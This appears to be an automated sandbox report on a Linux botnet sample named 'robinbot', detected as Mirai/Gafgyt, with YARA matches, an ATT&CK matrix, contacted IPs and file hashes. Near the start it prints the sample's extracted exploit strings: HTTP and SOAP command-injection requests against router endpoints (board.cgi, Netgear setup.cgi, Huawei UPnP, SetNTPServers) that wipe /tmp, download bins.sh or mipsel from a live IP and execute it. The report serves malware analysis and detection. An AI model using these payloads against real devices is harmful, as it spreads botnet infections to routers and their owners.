              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: Initial samplePotential command found: GET / HTTP/1.1
              Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.203.251.188/bin.sh;chmod+777+bin.sh;sh+/tmp/bins.sh+varcron
              Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://89.203.251.188/bins.sh;${IFS}sh${IFS}/var/tmp/bins.sh
              Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://89.203.251.188/bins.sh;chmod+777+bins.sh;sh+bins.sh+b HTTP/1.1
              Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.203.251.188/bins.sh;sh${IFS}/tmp/bins.sh&>r&&tar${IFS}/string.js HTTP/1.0
              Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.203.251.188/bins.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.203.251.188/bin.sh;chmod+777+bin.sh;sh+/tmp/bins.sh+varcronGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://89.203.251.188/bins.sh;${IFS}sh${IFS}/var/tmp/bins.shPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
              Source: robinbotELF static info symbol of initial sample: scanner.c
              Source: robinbotELF static info symbol of initial sample: scanner10_pid
              Source: robinbotELF static info symbol of initial sample: scanner11_pid
              Source: robinbotELF static info symbol of initial sample: scanner12_pid
              Source: robinbotELF static info symbol of initial sample: scanner13_pid
              Source: robinbotELF static info symbol of initial sample: scanner2_pid
              Source: robinbotELF static info symbol of initial sample: scanner3_pid
              Source: robinbotELF static info symbol of initial sample: scanner4_pid
              Source: robinbotELF static info symbol of initial sample: scanner5_pid
              Source: robinbotELF static info symbol of initial sample: scanner6_pid
              Source: robinbotELF static info symbol of initial sample: scanner7_pid
              Source: robinbotELF static info symbol of initial sample: scanner8_pid
              Source: robinbotELF static info symbol of initial sample: scanner9_pid
              Source: robinbotELF static info symbol of initial sample: scanner_init
              Source: robinbotELF static info symbol of initial sample: scanner_kill
              Source: robinbotELF static info symbol of initial sample: scanner_pid
              Source: robinbotELF static info symbol of initial sample: scanner_rawpkt
              Source: Initial sampleString containing 'busybox' found: orf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://89.203.251.188/mipsel && chmod +x mipsel && ./mipsel
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.203.251.188/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.203.251.188 -l /tmp/huawei -r /bins.sh;chmod -x huawei;sh /tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: consoleAtTCPBukkitJoinUDPStormMinecraftRandomNameRandomBytesMotdorf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://89.203.251.188/mipsel && chmod +x mipsel && ./mipsel
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.203.251.188/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /UD/act?1 HTTP/1.1
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.203.251.188/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.203.251.188 -l /tmp/huawei -r /bins.sh;chmod -x huawei;sh /tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.203.251.188/bins.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: classification engineClassification label: mal100.troj.evad.lin@0/0@0/0
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/memcpy.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/mempcpy.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/memset.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strchr.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strcmp.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strcpy.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strcspn.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strlen.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strpbrk.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strspn.S
              Source: robinbotELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crt1.S
              Source: robinbotELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crti.S
              Source: robinbotELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crtn.S
              Source: robinbotELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/vfork.S

              Hooking and other Techniques for Hiding and Protection

              barindex
              Sample deletes itself
              Source: /tmp/robinbot (PID: 6224)File: /tmp/robinbotJump to behavior
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48294
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48298
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48304
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48280
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48332
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48346
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48350
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48356
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48310
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48356
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48362
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48366
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48358
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48362

              Stealing of Sensitive Information

              barindex
              Yara detected Mirai
              Source: Yara matchFile source: robinbot, type: SAMPLE
              Source: Yara matchFile source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 6224, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 6226, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 6227, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Mirai
              Source: Yara matchFile source: robinbot, type: SAMPLE
              Source: Yara matchFile source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 6224, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 6226, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 6227, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Command and Scripting Interpreter              		Path InterceptionPath Interception1
              Masquerading              		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              File Deletion              		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
              Non-Standard Port              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
              Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

              Malware Configuration

              No configs have been found

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756090 Sample: robinbot Startdate: 29/11/2022 Architecture: LINUX Score: 100 22 64.55.26.12, 23 XO-AS15US United States 2->22 24 156.124.138.111, 23 XNSTGCA United States 2->24 26 98 other IPs or domains 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Yara detected Mirai 2->32 34 2 other signatures 2->34 9 robinbot 2->9         started        signatures3 process4 signatures5 36 Sample deletes itself 9->36 12 robinbot 9->12         started        process6 process7 14 robinbot 12->14         started        16 robinbot 12->16         started        18 robinbot 12->18         started        process8 20 robinbot 14->20         started       

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              robinbot66%VirustotalBrowse
              robinbot62%ReversingLabsLinux.Trojan.Mirai
              robinbot100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://purenetworks.com/HNAP1/0%URL Reputationsafe
              http://89.203.251.188/mips14%VirustotalBrowse
              http://89.203.251.188/mipsel16%VirustotalBrowse
              http://89.203.251.188/bins.sh16%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://89.203.251.188/mipselrobinbottrueunknown
              http://89.203.251.188/mipsrobinbottrueunknown
              http://89.203.251.188/bins.shrobinbottrueunknown
              http://89.203.251.188/bins.sh;shrobinbottrue
                		unknown
                http://89.203.251.188/bins.sh;$robinbottrue
                  		unknown
                  http://89.203.251.188/bins.sh;sh$robinbottrue
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/robinbotfalse
                      		high
                      http://89.203.251.188/bins.sh;chmodrobinbottrue
                        		unknown
                        http://89.203.251.188/bin.sh;chmodrobinbotfalse
                          		unknown
                          http://purenetworks.com/HNAP1/robinbotfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/envelope/robinbotfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            80.35.75.46
                            		unknownSpain
                            		3352TELEFONICA_DE_ESPANAESfalse
                            6.118.77.236
                            		unknownUnited States
                            		3356LEVEL3USfalse
                            91.41.187.63
                            		unknownGermany
                            		3320DTAGInternetserviceprovideroperationsDEfalse
                            38.232.0.124
                            		unknownUnited States
                            		174COGENT-174USfalse
                            61.67.139.220
                            		unknownTaiwan; Republic of China (ROC)
                            		18042KBTKoosBroadbandTelecomTWfalse
                            18.73.84.40
                            		unknownUnited States
                            		3MIT-GATEWAYSUSfalse
                            54.189.109.52
                            		unknownUnited States
                            		16509AMAZON-02USfalse
                            159.127.252.127
                            		unknownUnited States
                            		40088WESTLAKE-CHEMICAL-CORPORATIONUSfalse
                            81.164.55.227
                            		unknownBelgium
                            		6848TELENET-ASBEfalse
                            88.242.157.205
                            		unknownTurkey
                            		9121TTNETTRfalse
                            214.230.190.173
                            		unknownUnited States
                            		721DNIC-ASBLK-00721-00726USfalse
                            70.130.127.120
                            		unknownUnited States
                            		7018ATT-INTERNET4USfalse
                            81.118.216.50
                            		unknownItaly
                            		20959TELECOM-ITALIA-DATA-COMITfalse
                            172.34.163.179
                            		unknownUnited States
                            		21928T-MOBILE-AS21928USfalse
                            221.196.126.31
                            		unknownChina
                            		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                            59.144.17.163
                            		unknownIndia
                            		9498BBIL-APBHARTIAirtelLtdINfalse
                            171.11.220.232
                            		unknownChina
                            		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                            96.78.57.120
                            		unknownUnited States
                            		7922COMCAST-7922USfalse
                            208.55.17.111
                            		unknownUnited States
                            		21928T-MOBILE-AS21928USfalse
                            9.138.207.32
                            		unknownUnited States
                            		3356LEVEL3USfalse
                            210.89.174.118
                            		unknownKorea Republic of
                            		23576NHN-AS-KRNBPKRfalse
                            126.59.220.9
                            		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                            187.193.239.218
                            		unknownMexico
                            		8151UninetSAdeCVMXfalse
                            186.39.62.55
                            		unknownArgentina
                            		22927TelefonicadeArgentinaARfalse
                            163.143.129.154
                            		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                            136.166.182.171
                            		unknownUnited States
                            		53380LGCNS-ASUSfalse
                            21.237.201.27
                            		unknownUnited States
                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            213.41.96.24
                            		unknownUnited Kingdom
                            		8220COLTCOLTTechnologyServicesGroupLimitedGBfalse
                            193.102.5.120
                            		unknownGermany
                            		702UUNETUSfalse
                            186.246.117.188
                            		unknownBrazil
                            		7738TelemarNorteLesteSABRfalse
                            187.192.10.153
                            		unknownMexico
                            		8151UninetSAdeCVMXfalse
                            61.116.87.5
                            		unknownJapan4725ODNSoftBankMobileCorpJPfalse
                            167.60.168.222
                            		unknownUruguay
                            		6057AdministracionNacionaldeTelecomunicacionesUYfalse
                            116.80.199.207
                            		unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
                            87.101.55.190
                            		unknownCanada
                            		395965CARRY-TELECOMCAfalse
                            19.118.115.129
                            		unknownUnited States
                            		3MIT-GATEWAYSUSfalse
                            33.235.161.93
                            		unknownUnited States
                            		2686ATGS-MMD-ASUSfalse
                            89.117.49.33
                            		unknownLithuania
                            		15419LRTC-ASLTfalse
                            143.117.198.40
                            		unknownUnited Kingdom
                            		786JANETJiscServicesLimitedGBfalse
                            177.119.63.81
                            		unknownBrazil
                            		26599TELEFONICABRASILSABRfalse
                            80.241.211.157
                            		unknownGermany
                            		51167CONTABODEfalse
                            57.101.184.167
                            		unknownBelgium
                            		2647SITABEfalse
                            170.16.211.66
                            		unknownUnited States
                            		3762INSTINET-ASUSfalse
                            112.212.163.231
                            		unknownKorea Republic of
                            		38103QRIXNETKS-AS-KRTBroadKRfalse
                            207.102.151.228
                            		unknownCanada
                            		852ASN852CAfalse
                            38.136.33.70
                            		unknownUnited States
                            		174COGENT-174USfalse
                            89.101.167.182
                            		unknownIreland
                            		6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                            187.164.183.126
                            		unknownMexico
                            		11888TelevisionInternacionalSAdeCVMXfalse
                            220.148.44.31
                            		unknownJapan10010TOKAITOKAICommunicationsCorporationJPfalse
                            47.205.45.6
                            		unknownUnited States
                            		5650FRONTIER-FRTRUSfalse
                            8.182.132.211
                            		unknownSingapore
                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                            156.124.138.111
                            		unknownUnited States
                            		393504XNSTGCAfalse
                            101.45.38.38
                            		unknownChina
                            		131536SHGWBNNETShanghaiGreatWallBroadbandNetworkServiceCofalse
                            27.250.178.21
                            		unknownIndia
                            		10201DWL-AS-INDishnetWirelessLimitedBroadbandWirelessINfalse
                            65.62.218.42
                            		unknownUnited States
                            		32475SINGLEHOP-LLCUSfalse
                            122.143.153.102
                            		unknownChina
                            		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                            28.160.213.24
                            		unknownUnited States
                            		7922COMCAST-7922USfalse
                            3.253.254.97
                            		unknownUnited States
                            		16509AMAZON-02USfalse
                            30.167.8.81
                            		unknownUnited States
                            		7922COMCAST-7922USfalse
                            81.196.45.185
                            		unknownRomania
                            		8708RCS-RDS73-75DrStaicoviciROfalse
                            67.7.29.224
                            		unknownUnited States
                            		209CENTURYLINK-US-LEGACY-QWESTUSfalse
                            7.85.44.27
                            		unknownUnited States
                            		3356LEVEL3USfalse
                            78.252.226.253
                            		unknownFrance
                            		12322PROXADFRfalse
                            34.229.40.203
                            		unknownUnited States
                            		14618AMAZON-AESUSfalse
                            182.208.38.191
                            		unknownKorea Republic of
                            		17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
                            96.133.36.29
                            		unknownUnited States
                            		7922COMCAST-7922USfalse
                            41.29.151.105
                            		unknownSouth Africa
                            		29975VODACOM-ZAfalse
                            64.55.26.12
                            		unknownUnited States
                            		2828XO-AS15USfalse
                            7.93.119.228
                            		unknownUnited States
                            		3356LEVEL3USfalse
                            199.33.243.208
                            		unknownUnited States
                            		22772LOGINUSfalse
                            129.243.192.27
                            		unknownUnited States
                            		224UNINETTUNINETTTheNorwegianUniversityResearchNetworkfalse
                            181.89.27.130
                            		unknownArgentina
                            		7303TelecomArgentinaSAARfalse
                            167.66.204.206
                            		unknownUnited States
                            		54996SCRIPPSHEALTHUSfalse
                            33.221.234.237
                            		unknownUnited States
                            		2686ATGS-MMD-ASUSfalse
                            74.178.232.94
                            		unknownUnited States
                            		10796TWC-10796-MIDWESTUSfalse
                            175.225.181.174
                            		unknownKorea Republic of
                            		4766KIXS-AS-KRKoreaTelecomKRfalse
                            140.245.121.104
                            		unknownUnited States
                            		23151TERC-1USfalse
                            17.133.168.237
                            		unknownUnited States
                            		714APPLE-ENGINEERINGUSfalse
                            208.71.205.168
                            		unknownUnited States
                            		23038BRDBND-USER-GRPUSfalse
                            212.85.27.10
                            		unknownUnited Kingdom
                            		34837IRANET-IPMIRfalse
                            124.103.126.181
                            		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                            176.159.25.20
                            		unknownFrance
                            		5410BOUYGTEL-ISPFRfalse
                            219.251.84.40
                            		unknownKorea Republic of
                            		9318SKB-ASSKBroadbandCoLtdKRfalse
                            166.220.161.241
                            		unknownUnited States
                            		20057ATT-MOBILITY-LLC-AS20057USfalse
                            46.47.38.141
                            		unknownRussian Federation
                            		197298ATEL-LTDRRUfalse
                            59.172.104.200
                            		unknownChina
                            		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                            30.142.205.212
                            		unknownUnited States
                            		7922COMCAST-7922USfalse
                            142.244.176.203
                            		unknownCanada
                            		3359U-ALBERTACAfalse
                            42.191.233.168
                            		unknownMalaysia
                            		4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                            151.174.62.248
                            		unknownUnited States
                            		45025EDN-ASUAfalse
                            131.161.116.137
                            		unknownBrazil
                            		264382RctelSolucoesemTelecomBRfalse
                            222.63.226.200
                            		unknownChina
                            		9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                            34.10.49.63
                            		unknownUnited States
                            		2686ATGS-MMD-ASUSfalse
                            126.215.162.224
                            		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                            56.57.227.244
                            		unknownUnited States
                            		2686ATGS-MMD-ASUSfalse
                            97.25.51.224
                            		unknownUnited States
                            		22394CELLCOUSfalse
                            180.154.231.146
                            		unknownChina
                            		4812CHINANET-SH-APChinaTelecomGroupCNfalse
                            144.152.71.222
                            		unknownUnited States
                            		58541CHINATELECOM-SHANDONG-QINGDAO-IDCQingdao266000CNfalse
                            197.142.59.60
                            		unknownAlgeria
                            		36891ICOSNET-ASDZfalse
                            166.233.218.108
                            		unknownUnited States
                            		6614USCC-ASNUSfalse

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASNs

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
                            Entropy (8bit):6.25564436844842
                            TrID:
                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                            File name:robinbot
                            File size:133298
                            MD5:500009d8f68330a8f82b59884a9afe47
                            SHA1:575f5e6894b1a2f7a728435487666acdb9758f83
                            SHA256:a46770913fba87921b56d789396e07cdfd68a846b2e80a77aa07e1c62f9304d6
                            SHA512:ec62621ec2e037cb9f3890486ff4fb127ee6b34657ee7c2b1e3401de5d7fa2bb554e62d5c378dd93c43a3bb0bf4d210556cf8e67c0ff8449d0c615262e94dfba
                            SSDEEP:3072:xffIDJOocVBUbd8A2W3M/fvLUpANet2xBTd:xgDAtVmB8sM/fvLUpANet2xBTd
                            TLSH:CED306C76E527DBBC2C6EAF96AFBE01084E3B839576A224077C47DA5190ECC41D2D309
                            File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@......}.......}................................Q.......Q.....h........5..............Q.td....................................................H...._....J...H........

                            Static ELF Info

                            ELF header

                            Class:
                            Data:
                            Version:
                            Machine:
                            Version Number:
                            Type:
                            OS/ABI:
                            ABI Version:
                            Entry Point Address:
                            Flags:
                            ELF Header Size:
                            Program Header Offset:
                            Program Header Size:
                            Number of Program Headers:
                            Section Header Offset:
                            Section Header Size:
                            Number of Section Headers:
                            Header String Table Index:

                            Sections

                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                            NULL0x00x00x00x00x0000
                            .initPROGBITS0x4000e80xe80x130x00x6AX001
